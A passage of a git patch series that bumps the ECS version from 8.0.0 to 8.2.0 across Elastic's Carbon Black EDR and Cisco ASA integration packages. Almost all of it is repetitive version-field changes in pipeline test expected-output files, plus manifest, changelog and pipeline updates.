"binaryinfo.group.observed", @@ -284,7 +284,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -323,7 +323,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -370,7 +370,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -438,7 +438,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -481,7 +481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -542,7 +542,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -603,7 +603,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -647,7 +647,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -680,7 +680,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -718,7 +718,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -765,7 +765,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -809,7 +809,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -842,7 +842,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -892,7 +892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -931,7 +931,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -976,7 +976,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1020,7 +1020,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1053,7 +1053,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1104,7 +1104,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1156,7 +1156,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -1241,7 +1241,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1279,7 +1279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1323,7 +1323,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1358,7 +1358,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1409,7 +1409,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1475,7 +1475,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -1552,7 +1552,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1590,7 +1590,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1627,7 +1627,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -1672,7 +1672,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1707,7 +1707,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1760,7 +1760,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1821,7 +1821,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1931,7 +1931,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1968,7 +1968,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2010,7 +2010,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2057,7 +2057,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2092,7 +2092,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2143,7 +2143,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2212,7 +2212,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -2274,7 +2274,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -2312,7 +2312,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -2349,7 +2349,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2391,7 +2391,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2438,7 +2438,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2481,7 +2481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -2526,7 +2526,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2577,7 +2577,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2614,7 +2614,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -2655,7 +2655,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -2693,7 +2693,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -2730,7 +2730,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2772,7 +2772,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2819,7 +2819,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2862,7 +2862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -2907,7 +2907,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2957,7 +2957,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -3047,7 +3047,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -3095,7 +3095,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -3133,7 +3133,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -3170,7 +3170,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -3212,7 +3212,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -3259,7 +3259,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -3302,7 +3302,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -3347,7 +3347,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -3398,7 +3398,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -3433,7 +3433,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -3482,7 +3482,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -3530,7 +3530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -3582,7 +3582,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.childproc", @@ -3621,7 +3621,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -3658,7 +3658,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -3704,7 +3704,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -3751,7 +3751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -3794,7 +3794,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -3839,7 +3839,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -3889,7 +3889,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -3933,7 +3933,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -3988,7 +3988,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -4036,7 +4036,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -4088,7 +4088,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.childproc", @@ -4127,7 +4127,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -4177,7 +4177,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.filemod", @@ -4218,7 +4218,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -4265,7 +4265,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -4308,7 +4308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -4353,7 +4353,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -4403,7 +4403,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -4449,7 +4449,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.filemod", @@ -4501,7 +4501,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", diff --git a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 6e59379d789..a10ab732a9e 100644 --- a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,7 @@ processors: - set: field: ecs.version - value: 8.0.0 + value: 8.2.0 # Validate that the input document conforms to the expected format # to avoid repetitive checks. diff --git a/packages/carbonblack_edr/data_stream/log/sample_event.json b/packages/carbonblack_edr/data_stream/log/sample_event.json index 023f080713f..5afdcc33ab1 100644 --- a/packages/carbonblack_edr/data_stream/log/sample_event.json +++ b/packages/carbonblack_edr/data_stream/log/sample_event.json @@ -24,7 +24,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "9cb9fa70-f3e9-45d8-b1cb-61425bd93e1a", diff --git a/packages/carbonblack_edr/docs/README.md b/packages/carbonblack_edr/docs/README.md index 2effb4ae040..c0171ad7617 100644 --- a/packages/carbonblack_edr/docs/README.md +++ b/packages/carbonblack_edr/docs/README.md @@ -58,7 +58,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "9cb9fa70-f3e9-45d8-b1cb-61425bd93e1a", diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml index 63ec957fb30..07261a6ae97 100644 --- a/packages/carbonblack_edr/manifest.yml +++ b/packages/carbonblack_edr/manifest.yml @@ -1,6 +1,6 @@ name: carbonblack_edr title: VMware Carbon Black EDR -version: 1.1.0 +version: 1.2.0 release: ga description: Collect logs from VMware Carbon Black EDR with Elastic Agent. type: integration From 213498a1878da98c238c64c3fc982d03211eb498 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 14:53:14 -0600 Subject: [PATCH 10/23] Update cisco_asa to ECS 8.2 --- packages/cisco_asa/_dev/build/build.yml | 2 +- packages/cisco_asa/changelog.yml | 5 + ...test-additional-messages.log-expected.json | 170 +++--- ...test-anyconnect-messages.log-expected.json | 24 +- .../pipeline/test-asa-fix.log-expected.json | 22 +- .../test-asa-missing-groups.log-expected.json | 10 +- .../test/pipeline/test-asa.log-expected.json | 536 +++++++++--------- .../test-dap-records.log-expected.json | 2 +- .../pipeline/test-filtered.log-expected.json | 6 +- .../pipeline/test-hostnames.log-expected.json | 4 +- .../pipeline/test-not-ip.log-expected.json | 6 +- .../pipeline/test-sample.log-expected.json | 144 ++--- .../test/pipeline/test-sip.log-expected.json | 8 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_asa/docs/README.md | 2 +- packages/cisco_asa/manifest.yml | 2 +- 17 files changed, 476 insertions(+), 471 deletions(-) diff --git a/packages/cisco_asa/_dev/build/build.yml b/packages/cisco_asa/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_asa/_dev/build/build.yml +++ b/packages/cisco_asa/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index f71ecb3afc2..7be2c76dc7a 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.1.0" changes: - description: Add parsing for event code 113029-113040 diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 437e557653a..1b8f57939ba 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -22,7 +22,7 @@ "port": 53500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -108,7 +108,7 @@ "port": 53500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -186,7 +186,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -247,7 +247,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -307,7 +307,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -370,7 +370,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -445,7 +445,7 @@ "port": 111 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -526,7 +526,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -598,7 +598,7 @@ "port": 67 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -673,7 +673,7 @@ "port": 21 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -740,7 +740,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -784,7 +784,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -843,7 +843,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -904,7 +904,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -961,7 +961,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1025,7 +1025,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1092,7 +1092,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1160,7 +1160,7 @@ "port": 55225 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1247,7 +1247,7 @@ "port": 54839 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1325,7 +1325,7 @@ "port": 54230 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1401,7 +1401,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1470,7 +1470,7 @@ "port": 57006 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1542,7 +1542,7 @@ "port": 14322 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1614,7 +1614,7 @@ "port": 53356 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1700,7 +1700,7 @@ "port": 22638 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1786,7 +1786,7 @@ "port": 22638 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1865,7 +1865,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1938,7 +1938,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2006,7 +2006,7 @@ "port": 65020 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2076,7 +2076,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2145,7 +2145,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2214,7 +2214,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2284,7 +2284,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2357,7 +2357,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2430,7 +2430,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2503,7 +2503,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2581,7 +2581,7 @@ "port": 39222 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2653,7 +2653,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2705,7 +2705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2764,7 +2764,7 @@ "port": 3452 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2840,7 +2840,7 @@ "port": 6007 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2907,7 +2907,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2949,7 +2949,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "port": 1985 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3060,7 +3060,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3102,7 +3102,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3151,7 +3151,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3227,7 +3227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3277,7 +3277,7 @@ "port": 2 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3351,7 +3351,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3420,7 +3420,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3481,7 +3481,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3542,7 +3542,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3603,7 +3603,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3681,7 +3681,7 @@ "port": 9101 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3772,7 +3772,7 @@ "port": 51635 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3848,7 +3848,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3915,7 +3915,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3966,7 +3966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4028,7 +4028,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4084,7 +4084,7 @@ "ip": "10.10.1.254" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4151,7 +4151,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4215,7 +4215,7 @@ "ip": "10.10.1.254" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4282,7 +4282,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4340,7 +4340,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4420,7 +4420,7 @@ "ip": "81.2.69.144" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4486,7 +4486,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4545,7 +4545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4617,7 +4617,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4680,7 +4680,7 @@ "port": 23 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4762,7 +4762,7 @@ "port": 123123 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "bypass", @@ -4848,7 +4848,7 @@ "port": 514514 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "drop", @@ -4925,7 +4925,7 @@ "port": 123412 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5007,7 +5007,7 @@ "port": 514514 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5088,7 +5088,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "created", @@ -5159,7 +5159,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deleted", @@ -5241,7 +5241,7 @@ "port": 7777 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "connection-started", @@ -5317,7 +5317,7 @@ "port": 7777 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5387,7 +5387,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5440,7 +5440,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5490,7 +5490,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5542,7 +5542,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5587,7 +5587,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5629,7 +5629,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5674,7 +5674,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json index 6ead89a1752..751d6505ee3 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json @@ -6,7 +6,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -82,7 +82,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -158,7 +158,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -234,7 +234,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -310,7 +310,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": 